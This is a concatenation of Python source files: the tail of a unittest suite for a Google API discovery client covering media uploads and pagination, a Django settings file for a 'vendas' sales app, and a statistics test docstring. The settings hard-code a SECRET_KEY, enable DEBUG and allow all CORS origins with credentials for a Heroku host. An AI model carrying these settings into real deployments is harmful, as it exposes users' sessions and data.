q="foo", i=1, n=1, b=False, a=[1,2,3], o={'a':1}, e='bar')
self._check_query_types(request)
request = zoo.query(
q="foo", i="1", n="1", b="", a=[1,2,3], o={'a':1}, e='bar', er='two')
request = zoo.query(
q="foo", i="1", n="1", b="", a=[1,2,3], o={'a':1}, e='bar',
er=['one', 'three'], rr=['foo', 'bar'])
self._check_query_types(request)
# Five is right out.
self.assertRaises(TypeError, zoo.query, er=['one', 'five'])
def test_optional_stack_query_parameters(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(trace='html', fields='description')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['trace'], ['html'])
self.assertEqual(q['fields'], ['description'])
def test_string_params_value_of_none_get_dropped(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(trace=None, fields='description')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertFalse('trace' in q)
def test_model_added_query_parameters(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().get(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['alt'], ['json'])
self.assertEqual(request.headers['accept'], 'application/json')
def test_fallback_to_raw_model(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().getmedia(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertTrue('alt' not in q)
self.assertEqual(request.headers['accept'], '*/*')
def test_patch(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().patch(name='lion', body='{"description": "foo"}')
self.assertEqual(request.method, 'PATCH')
def test_batch_request_from_discovery(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
# zoo defines a batchPath
zoo = build('zoo', 'v1', http=self.http)
batch_request = zoo.new_batch_http_request()
self.assertEqual(batch_request._batch_uri,
"https://www.googleapis.com/batchZoo")
def test_batch_request_from_default(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
# plus does not define a batchPath
plus = build('plus', 'v1', http=self.http)
batch_request = plus.new_batch_http_request()
self.assertEqual(batch_request._batch_uri,
"https://www.googleapis.com/batch")
def test_tunnel_patch(self):
http = HttpMockSequence([
({'status': '200'}, open(datafile('zoo.json'), 'rb').read()),
({'status': '200'}, 'echo_request_headers_as_json'),
])
http = tunnel_patch(http)
zoo = build('zoo', 'v1', http=http, cache_discovery=False)
resp = zoo.animals().patch(
name='lion', body='{"description": "foo"}').execute()
self.assertTrue('x-http-method-override' in resp)
def test_plus_resources(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
self.assertTrue(getattr(plus, 'activities'))
self.assertTrue(getattr(plus, 'people'))
def test_oauth2client_credentials(self):
credentials = mock.Mock(spec=GoogleCredentials)
credentials.create_scoped_required.return_value = False
discovery = open(datafile('plus.json')).read()
service = build_from_document(discovery, credentials=credentials)
self.assertEqual(service._http, credentials.authorize.return_value)
def test_google_auth_credentials(self):
credentials = mock.Mock(spec=google.auth.credentials.Credentials)
discovery = open(datafile('plus.json')).read()
service = build_from_document(discovery, credentials=credentials)
self.assertIsInstance(service._http, google_auth_httplib2.AuthorizedHttp)
self.assertEqual(service._http.credentials, credentials)
def test_no_scopes_no_credentials(self):
# Zoo doesn't have scopes
discovery = open(datafile('zoo.json')).read()
service = build_from_document(discovery)
# Should be an ordinary httplib2.Http instance and not AuthorizedHttp.
self.assertIsInstance(service._http, httplib2.Http)
def test_full_featured(self):
# Zoo should exercise all discovery facets
# and should also have no future.json file.
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.animals().list(name='bat', projection="full")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['name'], ['bat'])
self.assertEqual(q['projection'], ['full'])
def test_nested_resources(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.my().favorites().list(max_results="5")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['max-results'], ['5'])
@unittest.skipIf(six.PY3, 'print is not a reserved name in Python 3')
def test_methods_with_reserved_names(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'animals'))
request = zoo.global_().print_().assert_(max_results="5")
parsed = urlparse(request.uri)
self.assertEqual(parsed[2], '/zoo/v1/global/print/assert')
def test_top_level_functions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
self.assertTrue(getattr(zoo, 'query'))
request = zoo.query(q="foo")
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['q'], ['foo'])
def test_simple_media_uploads(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
doc = getattr(zoo.animals().insert, '__doc__')
self.assertTrue('media_body' in doc)
def test_simple_media_upload_no_max_size_provided(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().crossbreed(media_body=datafile('small.png'))
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
def test_simple_media_raise_correct_exceptions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('smiley.png'))
self.fail("should throw exception if media is too large.")
except MediaUploadSizeError:
pass
try:
zoo.animals().insert(media_body=datafile('small.jpg'))
self.fail("should throw exception if mimetype is unacceptable.")
except UnacceptableMimeTypeError:
pass
def test_simple_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(media_body=datafile('small.png'))
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=media&alt=json',
request.uri)
def test_simple_media_unknown_mimetype(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('small-png'))
self.fail("should throw exception if mimetype is unknown.")
except UnknownFileType:
pass
request = zoo.animals().insert(media_body=datafile('small-png'),
media_mime_type='image/png')
self.assertEquals('image/png', request.headers['content-type'])
self.assertEquals(b'PNG', request.body[1:4])
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=media&alt=json',
request.uri)
def test_multipart_media_raise_correct_exceptions(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
try:
zoo.animals().insert(media_body=datafile('smiley.png'), body={})
self.fail("should throw exception if media is too large.")
except MediaUploadSizeError:
pass
try:
zoo.animals().insert(media_body=datafile('small.jpg'), body={})
self.fail("should throw exception if mimetype is unacceptable.")
except UnacceptableMimeTypeError:
pass
def test_multipart_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(media_body=datafile('small.png'), body={})
self.assertTrue(request.headers['content-type'].startswith(
'multipart/related'))
with open(datafile('small.png'), 'rb') as f:
contents = f.read()
boundary = re.match(b'--=+([^=]+)', request.body).group(1)
self.assertEqual(
request.body.rstrip(b"\n"), # Python 2.6 does not add a trailing \n
b'--===============' + boundary + b'==\n' +
b'Content-Type: application/json\n' +
b'MIME-Version: 1.0\n\n' +
b'{"data": {}}\n' +
b'--===============' + boundary + b'==\n' +
b'Content-Type: image/png\n' +
b'MIME-Version: 1.0\n' +
b'Content-Transfer-Encoding: binary\n\n' +
contents +
b'\n--===============' + boundary + b'==--')
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=multipart&alt=json',
request.uri)
def test_media_capable_method_without_media(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
request = zoo.animals().insert(body={})
self.assertTrue(request.headers['content-type'], 'application/json')
def test_resumable_multipart_media_good_upload(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body={})
self.assertTrue(request.headers['content-type'].startswith(
'application/json'))
self.assertEquals('{"data": {}}', request.body)
self.assertEquals(media_upload, request.resumable)
self.assertEquals('image/png', request.resumable.mimetype())
self.assertNotEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/4',
'range': '0-%d' % (media_upload.size() - 2)}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
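# The mock sequence above plays back a resumable-upload session: each 308
# ("Resume Incomplete") response reports, via the 'range' header, how many
# bytes the server has accepted so far, and 'location' carries the updated
# session URI that the next chunk request must use.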
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(0, status.resumable_progress)
# Two requests should have been made and the resumable_uri should have been
# updated for each one.
self.assertEquals(request.resumable_uri, 'http://upload.example.com/2')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(0, request.resumable_progress)
# This next chunk call should upload the first chunk
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/3')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(13, request.resumable_progress)
# This call will upload the next chunk
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/4')
self.assertEquals(media_upload.size()-1, request.resumable_progress)
self.assertEquals('{"data": {}}', request.body)
# Final call to next_chunk should complete the upload.
status, body = request.next_chunk(http=http)
self.assertEquals(body, {"foo": "bar"})
self.assertEquals(status, None)
def test_resumable_media_good_upload(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
self.assertEquals(media_upload, request.resumable)
self.assertEquals('image/png', request.resumable.mimetype())
self.assertEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-%d' % (media_upload.size() - 2)}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(13, status.resumable_progress)
# Two requests should have been made and the resumable_uri should have been
# updated for each one.
self.assertEquals(request.resumable_uri, 'http://upload.example.com/2')
self.assertEquals(media_upload, request.resumable)
self.assertEquals(13, request.resumable_progress)
status, body = request.next_chunk(http=http)
self.assertEquals(request.resumable_uri, 'http://upload.example.com/3')
self.assertEquals(media_upload.size()-1, request.resumable_progress)
self.assertEquals(request.body, None)
# Final call to next_chunk should complete the upload.
status, body = request.next_chunk(http=http)
self.assertEquals(body, {"foo": "bar"})
self.assertEquals(status, None)
def test_resumable_media_good_upload_from_execute(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
assertUrisEqual(self,
'https://www.googleapis.com/upload/zoo/v1/animals?uploadType=resumable&alt=json',
request.uri)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-12'}, ''),
({'status': '308',
'location': 'http://upload.example.com/3',
'range': '0-%d' % media_upload.size()}, ''),
({'status': '200'}, '{"foo": "bar"}'),
])
body = request.execute(http=http)
self.assertEquals(body, {"foo": "bar"})
def test_resumable_media_fail_unknown_response_code_first_request(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
http = HttpMockSequence([
({'status': '400',
'location': 'http://upload.example.com'}, ''),
])
try:
request.execute(http=http)
self.fail('Should have raised ResumableUploadError.')
except ResumableUploadError as e:
self.assertEqual(400, e.resp.status)
def test_resumable_media_fail_unknown_response_code_subsequent_request(self):
"""Not a multipart upload."""
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('small.png'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, ''),
])
self.assertRaises(HttpError, request.execute, http=http)
self.assertTrue(request._in_error_state)
http = HttpMockSequence([
({'status': '308',
'range': '0-5'}, ''),
({'status': '308',
'range': '0-6'}, ''),
])
status, body = request.next_chunk(http=http)
self.assertEquals(status.resumable_progress, 7,
'Should have first checked length and then tried to PUT more.')
self.assertFalse(request._in_error_state)
# Put it back in an error state.
http = HttpMockSequence([
({'status': '400'}, ''),
])
self.assertRaises(HttpError, request.execute, http=http)
self.assertTrue(request._in_error_state)
# Pretend the last request that 400'd actually succeeded.
http = HttpMockSequence([
({'status': '200'}, '{"foo": "bar"}'),
])
status, body = request.next_chunk(http=http)
self.assertEqual(body, {'foo': 'bar'})
def test_media_io_base_stream_unlimited_chunksize_resume(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Set up a seekable stream and try to upload in single chunk.
fd = BytesIO(b'01234"56789"')
media_upload = MediaIoBaseUpload(
fd=fd, mimetype='text/plain', chunksize=-1, resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
# The single chunk fails, restart at the right point.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-4'}, ''),
({'status': '200'}, 'echo_request_body'),
])
body = request.execute(http=http)
self.assertEqual('56789', body)
def test_media_io_base_stream_chunksize_resume(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Set up a seekable stream and try to upload in chunks.
fd = BytesIO(b'0123456789')
media_upload = MediaIoBaseUpload(
fd=fd, mimetype='text/plain', chunksize=5, resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
# The single chunk fails, pull the content sent out of the exception.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, 'echo_request_body'),
])
try:
body = request.execute(http=http)
except HttpError as e:
self.assertEqual(b'01234', e.content)
def test_resumable_media_handle_uploads_of_unknown_size(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Create an upload that doesn't know the full size of the media.
class IoBaseUnknownLength(MediaUpload):
def chunksize(self):
return 10
def mimetype(self):
return 'image/png'
def size(self):
return None
def resumable(self):
return True
def getbytes(self, begin, length):
return '0123456789'
upload = IoBaseUnknownLength()
request = zoo.animals().insert(media_body=upload, body=None)
status, body = request.next_chunk(http=http)
self.assertEqual(body, {
'Content-Range': 'bytes 0-9/*',
'Content-Length': '10',
})
def test_resumable_media_no_streaming_on_unsupported_platforms(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
class IoBaseHasStream(MediaUpload):
def chunksize(self):
return 10
def mimetype(self):
return 'image/png'
def size(self):
return None
def resumable(self):
return True
def getbytes(self, begin, length):
return '0123456789'
def has_stream(self):
return True
def stream(self):
raise NotImplementedError()
upload = IoBaseHasStream()
orig_version = sys.version_info
sys.version_info = (2, 6, 5, 'final', 0)
request = zoo.animals().insert(media_body=upload, body=None)
# This should raise an exception because stream() will be called.
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.assertRaises(NotImplementedError, request.next_chunk, http=http)
sys.version_info = orig_version
def test_resumable_media_handle_uploads_of_unknown_size_eof(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '200'}, 'echo_request_headers_as_json'),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
fd = BytesIO(b'data goes here')
# Create an upload that doesn't know the full size of the media.
upload = MediaIoBaseUpload(
fd=fd, mimetype='image/png', chunksize=15, resumable=True)
request = zoo.animals().insert(media_body=upload, body=None)
status, body = request.next_chunk(http=http)
self.assertEqual(body, {
'Content-Range': 'bytes 0-13/14',
'Content-Length': '14',
})
def test_resumable_media_handle_resume_of_upload_of_unknown_size(self):
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '400'}, ''),
])
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
# Create an upload that doesn't know the full size of the media.
fd = BytesIO(b'data goes here')
upload = MediaIoBaseUpload(
fd=fd, mimetype='image/png', chunksize=500, resumable=True)
request = zoo.animals().insert(media_body=upload, body=None)
# Put it in an error state.
self.assertRaises(HttpError, request.next_chunk, http=http)
http = HttpMockSequence([
({'status': '400',
'range': '0-5'}, 'echo_request_headers_as_json'),
])
try:
# Should resume the upload by first querying the status of the upload.
request.next_chunk(http=http)
except HttpError as e:
expected = {
'Content-Range': 'bytes */14',
'content-length': '0'
}
self.assertEqual(expected, json.loads(e.content.decode('utf-8')),
'Should send an empty body when requesting the current upload status.')
def test_pickle(self):
sorted_resource_keys = ['_baseUrl',
'_developerKey',
'_dynamic_attrs',
'_http',
'_model',
'_requestBuilder',
'_resourceDesc',
'_rootDesc',
'_schema',
'animals',
'global_',
'load',
'loadNoTemplate',
'my',
'new_batch_http_request',
'query',
'scopedAnimals']
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
self.assertEqual(sorted(zoo.__dict__.keys()), sorted_resource_keys)
pickled_zoo = pickle.dumps(zoo)
new_zoo = pickle.loads(pickled_zoo)
self.assertEqual(sorted(new_zoo.__dict__.keys()), sorted_resource_keys)
self.assertTrue(hasattr(new_zoo, 'animals'))
self.assertTrue(callable(new_zoo.animals))
self.assertTrue(hasattr(new_zoo, 'global_'))
self.assertTrue(callable(new_zoo.global_))
self.assertTrue(hasattr(new_zoo, 'load'))
self.assertTrue(callable(new_zoo.load))
self.assertTrue(hasattr(new_zoo, 'loadNoTemplate'))
self.assertTrue(callable(new_zoo.loadNoTemplate))
self.assertTrue(hasattr(new_zoo, 'my'))
self.assertTrue(callable(new_zoo.my))
self.assertTrue(hasattr(new_zoo, 'query'))
self.assertTrue(callable(new_zoo.query))
self.assertTrue(hasattr(new_zoo, 'scopedAnimals'))
self.assertTrue(callable(new_zoo.scopedAnimals))
self.assertEqual(sorted(zoo._dynamic_attrs), sorted(new_zoo._dynamic_attrs))
self.assertEqual(zoo._baseUrl, new_zoo._baseUrl)
self.assertEqual(zoo._developerKey, new_zoo._developerKey)
self.assertEqual(zoo._requestBuilder, new_zoo._requestBuilder)
self.assertEqual(zoo._resourceDesc, new_zoo._resourceDesc)
self.assertEqual(zoo._rootDesc, new_zoo._rootDesc)
# _http, _model and _schema won't be equal since we will get new
# instances upon un-pickling
def _dummy_zoo_request(self):
with open(os.path.join(DATA_DIR, 'zoo.json'), 'rU') as fh:
zoo_contents = fh.read()
zoo_uri = uritemplate.expand(DISCOVERY_URI,
{'api': 'zoo', 'apiVersion': 'v1'})
if 'REMOTE_ADDR' in os.environ:
zoo_uri = util._add_query_parameter(zoo_uri, 'userIp',
os.environ['REMOTE_ADDR'])
http = build_http()
original_request = http.request
def wrapped_request(uri, method='GET', *args, **kwargs):
if uri == zoo_uri:
return httplib2.Response({'status': '200'}), zoo_contents
return original_request(uri, method=method, *args, **kwargs)
http.request = wrapped_request
return http
def _dummy_token(self):
access_token = 'foo'
client_id = 'some_client_id'
client_secret = 'cOuDdkfjxxnv+'
refresh_token = '1/0/a.df219fjls0'
token_expiry = datetime.datetime.utcnow()
user_agent = 'refresh_checker/1.0'
return OAuth2Credentials(
access_token, client_id, client_secret,
refresh_token, token_expiry, GOOGLE_TOKEN_URI,
user_agent)
def test_pickle_with_credentials(self):
credentials = self._dummy_token()
http = self._dummy_zoo_request()
http = credentials.authorize(http)
self.assertTrue(hasattr(http.request, 'credentials'))
zoo = build('zoo', 'v1', http=http)
pickled_zoo = pickle.dumps(zoo)
new_zoo = pickle.loads(pickled_zoo)
self.assertEqual(sorted(zoo.__dict__.keys()),
sorted(new_zoo.__dict__.keys()))
new_http = new_zoo._http
self.assertFalse(hasattr(new_http.request, 'credentials'))
def test_resumable_media_upload_no_content(self):
self.http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=self.http)
media_upload = MediaFileUpload(datafile('empty'), resumable=True)
request = zoo.animals().insert(media_body=media_upload, body=None)
self.assertEquals(media_upload, request.resumable)
self.assertEquals(request.body, None)
self.assertEquals(request.resumable_uri, None)
http = HttpMockSequence([
({'status': '200',
'location': 'http://upload.example.com'}, ''),
({'status': '308',
'location': 'http://upload.example.com/2',
'range': '0-0'}, ''),
])
status, body = request.next_chunk(http=http)
self.assertEquals(None, body)
self.assertTrue(isinstance(status, MediaUploadProgress))
self.assertEquals(0, status.progress())
class Next(unittest.TestCase):
def test_next_successful_none_on_no_next_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
self.assertEqual(None, tasks.tasklists().list_next(request, {}))
def test_next_successful_none_on_empty_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
next_request = tasks.tasklists().list_next(
request, {'nextPageToken': ''})
self.assertEqual(None, next_request)
def test_next_successful_with_next_page_token(self):
self.http = HttpMock(datafile('tasks.json'), {'status': '200'})
tasks = build('tasks', 'v1', http=self.http)
request = tasks.tasklists().list()
next_request = tasks.tasklists().list_next(
request, {'nextPageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
def test_next_successful_with_next_page_token_alternate_name(self):
self.http = HttpMock(datafile('bigquery.json'), {'status': '200'})
bigquery = build('bigquery', 'v2', http=self.http)
request = bigquery.tabledata().list(datasetId='', projectId='', tableId='')
next_request = bigquery.tabledata().list_next(
request, {'pageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
def test_next_successful_with_next_page_token_in_body(self):
self.http = HttpMock(datafile('logging.json'), {'status': '200'})
logging = build('logging', 'v2', http=self.http)
request = logging.entries().list(body={})
next_request = logging.entries().list_next(
request, {'nextPageToken': '123abc'})
body = JsonModel().deserialize(next_request.body)
self.assertEqual(body['pageToken'], '123abc')
def test_next_with_method_with_no_properties(self):
self.http = HttpMock(datafile('latitude.json'), {'status': '200'})
service = build('latitude', 'v1', http=self.http)
service.currentLocation().get()
def test_next_nonexistent_with_no_next_page_token(self):
self.http = HttpMock(datafile('drive.json'), {'status': '200'})
drive = build('drive', 'v3', http=self.http)
drive.changes().watch(body={})
self.assertFalse(callable(getattr(drive.changes(), 'watch_next', None)))
def test_next_successful_with_next_page_token_required(self):
self.http = HttpMock(datafile('drive.json'), {'status': '200'})
drive = build('drive', 'v3', http=self.http)
request = drive.changes().list(pageToken='startPageToken')
next_request = drive.changes().list_next(
request, {'nextPageToken': '123abc'})
parsed = list(urlparse(next_request.uri))
q = parse_qs(parsed[4])
self.assertEqual(q['pageToken'][0], '123abc')
class MediaGet(unittest.TestCase):
def test_get_media(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.animals().get_media(name='Lion')
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['alt'], ['media'])
self.assertEqual(request.headers['accept'], '*/*')
http = HttpMockSequence([
({'status': '200'}, 'standing in for media'),
])
response = request.execute(http=http)
self.assertEqual(b'standing in for media', response)
if __name__ == '__main__':
unittest.main()
|
py | b410525235df656c536f9eaa88b2001a1aaa2cfe | """
Django settings for vendas project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-l)d%4bo%=ad8vtk9g%_ns^$@dq@q+l%rd(@3%!g&@&vtyxfebr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'vendas-mercos.herokuapp.com',
'127.0.0.1',
'localhost'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'pedidos.apps.PedidosConfig',
'clientes.apps.ClientesConfig',
'produtos.apps.ProdutosConfig',
'item_pedido.apps.ItemPedidoConfig',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True # If this is used then `CORS_ORIGIN_WHITELIST` will not have any effect
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_REGEX_WHITELIST = [
'http://localhost:8000',
]
ROOT_URLCONF = 'vendas.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'vendas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
in_heroku = False
if 'DATABASE_URL' in os.environ:
in_heroku = True
import dj_database_url
if in_heroku:
DATABASES = {'default': dj_database_url.config()}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
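# On Heroku, dj_database_url.config() reads the DATABASE_URL environment
# variable; an illustrative (not real) value looks like:
#   DATABASE_URL=postgres://user:password@host:5432/dbname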
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'COERCE_DECIMAL_TO_STRING': False,
} |
py | b41052d25339393a0e3dc10fa35844dbf48040cf | """ Verification tests for the categorical difference tests.
Author:
C.M. Gosmeyer
Date:
Mar 2018
References:
"Introduction to Statistical Problem Solving in Geography",
J.C. McGrew, Jr., A.J. Lembo, Jr., C.B. Monroe
"""
